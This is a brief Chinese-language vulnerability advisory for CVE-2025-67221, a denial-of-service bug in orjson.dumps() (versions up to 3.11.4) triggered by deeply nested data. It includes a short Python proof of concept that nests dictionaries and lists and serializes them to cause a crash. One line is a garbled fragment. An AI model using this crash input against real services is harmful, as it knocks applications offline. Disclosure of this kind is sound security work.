| 字段 | 值 |
|---|---|
| CVE ID | CVE-2025-67221 |
| 受影响的软件 | orjson |
| 受影响版本 | ≤ 3.11.4 |
| 漏洞类型 | 拒绝服务(未控制递归) |
| 攻击向量 | 远程(如果攻击者控制序列化数据) |
在orjson 3.11.4及更早版本的orjson.dumps()函数中存在一个拒绝服务漏洞。该函数在序列化深度嵌套的JSON数据结构时未实施递归限制。攻击者若能使应用程序序列化由攻击者控制的嵌套数据,则可触发序列化过程中的崩溃。
orjson.dumps()pysrc/orjson/__init__.pyi测试于:
使用orjson序列化不可信或攻击者控制的数据结构的应用程序可能容易遭受拒绝服务攻击。
在本地复现漏洞的代码:
import orjson
import sys
import platform
print(f'OS: {platform.platform()}')
print(f'Python version: {sys. version}')
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)
##演示
上述代码会导致一个完整的核心转储
